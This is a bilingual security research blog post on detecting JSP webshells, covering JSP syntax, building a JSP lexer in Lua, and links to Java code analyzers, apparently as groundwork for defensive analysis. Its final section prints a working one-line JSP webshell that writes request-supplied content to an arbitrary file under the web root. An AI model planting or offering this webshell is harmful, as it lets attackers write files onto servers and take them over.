Deformity JSP WebshellWebshell Hidden Learning

Posted 2020-06-22 Han Zheng, Researcher of Compu

catalogue

1. JSP基础语法
2. JSP Lexer By Lua
3. Open Source Code Analyzers in Java
4. WEBSHELL Samples

 

1. JSP基础语法

0x1: 脚本程序

脚本程序可以包含任意量的Java语句、变量、方法或表达式，只要它们在脚本语言中是有效的

脚本程序的语法格式：
<% 代码片段 %>

或者可以编写与其等价的XML语句
<jsp:scriptlet>
   代码片段
</jsp:scriptlet>

任何文本、html标签、JSP元素必须写在脚本程序的外面

<html>
<head><title>Hello World</title></head>
<body>
Hello World!<br/>
<%
out.println("Your IP address is " + request.getRemoteAddr());
%>
</body>
</html>

0x2: JSP声明

一个声明语句可以声明一个或多个变量、方法，供后面的Java代码使用。在JSP文件中，您必须先声明这些变量和方法然后才能使用它们
JSP声明的语法格式

<%! declaration; [ declaration; ]+ ... %>

或者也可以编写与其等价的XML语句
<jsp:declaration>
   代码片段
</jsp:declaration>

程序示例

<%! int i = 0; %> 
<%! int a, b, c; %> 
<%! Circle a = new Circle(2.0); %> 

0x3: JSP表达式

1. 一个JSP表达式中包含的脚本语言表达式，先被转化成String，然后插入到表达式出现的地方 
2. 由于表达式的值会被转化成String，所以您可以在一个文本行中使用表达式而不用去管它是否是HTML标签 
3. 表达式元素中可以包含任何符合Java语言规范的表达式，但是不能使用分号来结束表达式 

JSP表达式的语法格式

<%= 表达式 %>

同样也可以编写与之等价的XML语句 
<jsp:expression>
   表达式
</jsp:expression>

程序示例

<html> 
<head><title>A Comment Test</title></head> 
<body>
<p>
   Today‘s date: <%= (new java.util.Date()).toLocaleString()%>
</p>
</body> 
</html>

0x4: JSP注释

JSP注释主要有两个作用: 为代码作注释、以及将某段代码注释掉

1. HTML注释

<!-- comment [ <%= expression %> ] -->

示例

<!-- This file displays the user login screen --> 
在客户端的HTML源代码中产生和上面一样的数据： 
<!-- This file displays the user login screen -->

<!-- This page was loaded on <%= (new java.util.Date()).toLocaleString() %> -->

2. 隐藏注释

写在JSP程序中，但不是发给客户

<%-- 这里可以填写 JSP 注释 --%>

JSP编译器是不会对<%-- ... --%>之间的语句进行编译的，它不会显示在客户的浏览器中，也不会在源代码中看到在<%-- --%>之间的代码，你可以任意写注释语句，但是不能使用"--%>"，如果你非要使用请用"--%\>"

<html> 
<head><title>A Comment Test</title></head> 
<body> 
<h2>A Test of Comments</h2> 
<%-- 该部分注释在网页中不会被显示--%> 
</body> 
</html> 

0x5: JSP指令

JSP指令用来设置与整个JSP页面相关的属性
JSP指令语法格式

<%@ directive attribute="value" %>
这里有三种指令标签  
1. <%@ page ... %>: 定义页面的依赖属性，比如脚本语言、error页面、缓存需求等等
2. <%@ include ... %>: 包含其他文件
<%@ taglib ... %>: 引入标签库的定义，可以是自定义标签

0x6: JSP行为

JSP行为标签使用XML语法结构来控制servlet引擎。它能够动态插入一个文件，重用JavaBean组件，引导用户去另一个页面，为Java插件产生相关的HTML等等
行为标签只有一种语法格式，它严格遵守XML标准

<jsp:action_name attribute="value" />

0x7: JSP隐含对象

JSP支持九个自动定义的变量，称为隐含对象

1. request: HttpServletRequest类的实例
2. response: HttpServletResponse类的实例
3. out: PrintWriter类的实例，用于把结果输出至网页上
4. session: HttpSession类的实例
5. application: ServletContext类的实例，与应用上下文有关
6. config: ServletConfig类的实例
7. pageContext: PageContext类的实例，提供对JSP页面所有对象以及命名空间的访问
8. page: 类似于Java类中的this关键字
9. Exception: Exception类的对象，代表发生错误的JSP页面中对应的异常对象

0x8: JSP常量

JSP语言定义了以下几个常量

1. Boolean: true and false
2. Integer: 与Java中的一样
3. Floating point: 与Java中的一样
4. String: 以单引号或双引号开始和结束。" 被转义成 \"，‘被转义成 \‘， \ 被转义成\\
5. Null: null

Relevant Link:

http://www.runoob.com/jsp/jsp-syntax.html
http://vod.sjtu.edu.cn/help/Article_Show.asp?ArticleID=1448

 

2. JSP Lexer By Lua

0x1: Lexer Basics

The *lexers/* directory contains all lexers, including your new one. Before attempting to write one from scratch though, first determine if your programming language is similar to any of the 80+ languages supported. If so, you may be able to copy and modify that lexer, saving some time and effort.
The filename of your lexer should be the name of your programming language in lower case followed by a *.lua* extension. For example, a new Lua lexer has the name *lua.lua*.
Note: Try to refrain from using one-character language names like "b", "c", or "d". For example, Scintillua uses "b_lang", "cpp", and "dmd", respectively.

0x2: New Lexer Template

myLanguage LPeg lexer.

local l = require(‘lexer‘)
local token, word_match = l.token, l.word_match
local P, R, S = lpeg.P, lpeg.R, lpeg.S

local M = {_NAME = ‘?‘}

Whitespace.
local ws = token(l.WHITESPACE, l.space^1)

M._rules = {
    {‘whitespace‘, ws},
}
    
M._tokenstyles = {
    --
}
--
return M

0x3: Tokens

Take a moment to think about your programming language‘s structure. What kind of key elements does it have? In the template shown earlier, one predefined element all languages have is whitespace.
Your language probably also has elements like comments, strings, and keywords. Lexers refer to these elements as "tokens". Tokens are the fundamental "building blocks"(基础元素) of lexers.
Lexers break down source code into tokens for coloring, which results in the syntax highlighting familiar to you. It is up to you how specific your lexer is when it comes to tokens. Perhaps only distinguishing between keywords and identifiers is necessary, or maybe recognizing constants、built-in functions、methods、libraries is desirable.
The Lua lexer, for example, defines 11 tokens:

1. whitespace
2. comments
3. strings
4. numbers
5. keywords
6. built-in functions
7. constants
8. built-in libraries
9. identifiers: Even though constants, built-in functions, and built-in libraries are subsets of identifiers
10. labels
11. operators. 

In a lexer, tokens consist of a token name and an LPeg pattern that matches a sequence of characters recognized as an instance of that token(在GNU Lex中也是采用正则语法进行词法描述). Create tokens
using the [`lexer.token()`]() function. Let us examine the "whitespace" token defined in the template shown earlier:

local ws = token(l.WHITESPACE, l.space^1)

The `lexer` (`l`) module actually provides a convenient list of common token names and common LPeg patterns for you to use. Token names include

[`lexer.DEFAULT`](), 
[`lexer.WHITESPACE`](), 
[`lexer.COMMENT`](),
[`lexer.STRING`](), 
[`lexer.NUMBER`](), 
[`lexer.KEYWORD`](),
[`lexer.IDENTIFIER`](), 
[`lexer.OPERATOR`](), 
[`lexer.ERROR`](),
[`lexer.PREPROCESSOR`](), 
[`lexer.CONSTANT`](), 
[`lexer.VARIABLE`](),
[`lexer.FUNCTION`](), 
[`lexer.CLASS`](), 
[`lexer.TYPE`](), 
[`lexer.LABEL`](),
[`lexer.REGEX`](),

[`lexer.EMBEDDED`](). Patterns include
    [`lexer.any`](), 
    [`lexer.ascii`](), 
    [`lexer.extend`](),
    [`lexer.alpha`](),
    [`lexer.digit`](), 
    [`lexer.alnum`](), 
    [`lexer.lower`](), 
    [`lexer.upper`](),
    [`lexer.xdigit`](), 
    [`lexer.cntrl`](), 
    [`lexer.graph`](), 
    [`lexer.print`](),
    [`lexer.punct`](), 
    [`lexer.space`](), 
    [`lexer.newline`](),
    [`lexer.nonnewline`](), 
    [`lexer.nonnewline_esc`](), 
    [`lexer.dec_num`](),
    [`lexer.hex_num`](), 
    [`lexer.oct_num`](), 
    [`lexer.integer`](),
    [`lexer.float`](), 
    [`lexer.word`](). 

So, how might you define other tokens like comments, strings, and keywords? Here are some examples

1. Comments

Line-style comments with a prefix character(s) are easy to express with LPeg

local shell_comment = token(l.COMMENT, ‘#‘ * l.nonnewline^0)
local c_line_comment = token(l.COMMENT, ‘//‘ * l.nonnewline_esc^0)

C-style "block" comments with a start and end delimiter are also easy to express:

local c_comment = token(l.COMMENT, ‘/*‘ * (l.any - ‘*/‘)^0 * P(‘*/‘)^-1)

2. Strings

local dq_str = ‘"‘ * (l.any - ‘"‘)^0 * P(‘"‘)^-1
local sq_str = "‘" * (l.any - "‘")^0 * P("‘")^-1
local simple_string = token(l.STRING, dq_str + sq_str)

3. Keywords

local keyword = token(l.KEYWORD, l.word_match{
    ‘keyword_1‘, ‘keyword_2‘, ..., ‘keyword_n‘
})

local case_insensitive_keyword = token(l.KEYWORD, l.word_match({
    ‘KEYWORD_1‘, ‘keyword_2‘, ..., ‘KEYword_n‘
}, nil, true))

local hyphened_keyword = token(l.KEYWORD, l.word_match({
    ‘keyword-1‘, ‘keyword-2‘, ..., ‘keyword-n‘
}, ‘-‘))

0x4: 定界标签

1. Declaration tag

定义函数、方法、变量

<%! %>
<%! 
     private int example = 0 ; 
     private int test = 5 ; 
%>

<jsp:declaration> </jsp:declaration>
<jsp:declaration> 
    private int example = 0 ; 
    private int test = 5 ; 
</jsp:declaration>

2. Expression tag

<%= 表达式 %>
<%= (new java.util.Date()).toLocaleString() %>

<jsp:expression> </jsp:expression>
<jsp:expression>
    (new java.util.Date()).toLocaleString()
</jsp:expression>

3. Code tag

<% 代码片段 %>
<%
out.println("Your IP address is " + request.getRemoteAddr());
%>

<jsp:scriptlet> 
    out.println("Your IP address is " + request.getRemoteAddr()); 
</jsp:scriptlet>

0x5: lexer/media/lexers/jsp.lua

local l = require(‘lexer‘)
local token, word_match = l.token, l.word_match
local P, R, S = lpeg.P, lpeg.R, lpeg.S

local M = {_NAME = ‘jsp‘}

-- Embedded in HTML.
local html = l.load(‘html‘)

-- Embedded Java.
local java = l.load(‘java‘)
local java_start_rule = token(‘jsp_tag‘, ‘<%‘ * P(‘=‘)^-1)
local java_end_rule = token(‘jsp_tag‘, ‘%>‘)
l.embed_lexer(html, java, java_start_rule, java_end_rule, true)

M._tokenstyles = {
  jsp_tag = l.STYLE_EMBEDDED
}

local _foldsymbols = html._foldsymbols
_foldsymbols._patterns[#_foldsymbols._patterns + 1] = ‘<%%‘
_foldsymbols._patterns[#_foldsymbols._patterns + 1] = ‘%%>‘
_foldsymbols.jsp_tag = {[‘<%‘] = 1, [‘%>‘] = -1}
M._foldsymbols = _foldsymbols

return M

Relevant Link:

https://github.com/luapower/lexer/blob/master/lexer.lua
http://www.exforsys.com/tutorials/jsp/jsp-tags.html
https://github.com/luapower/lexer/blob/master/media/lexers/jsp.lua
https://github.com/luapower/lexer/blob/master/media/lexers/html.lua
https://github.com/luapower/lexer/blob/master/media/lexers/java.lua

 

3. Open Source Code Analyzers in Java

Relevant Link:

http://java-source.net/open-source/code-analyzers
https://pmd.github.io/
http://pmd.sourceforge.net/pmd-4.3.0/rules/basic-jsp.html
http://foicica.com/scintillua/api.html#lexer

 

4. WEBSHELL Samples

0x1: 写文件

<%  
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); 
%>

Relevant Link:

http://www.2cto.com/Article/201503/378649.html
http://www.blogjava.net/lusm/archive/2007/02/21/100295.html
http://dingody.iteye.com/blog/2003882
http://blog.kukafei520.net/html/2010/444.html
http://www.125135.com/491711.html
http://www.125135.com/317079.htm
http://www.125135.com/317770.htm

 

Copyright (c) 2016 LittleHann All rights reserved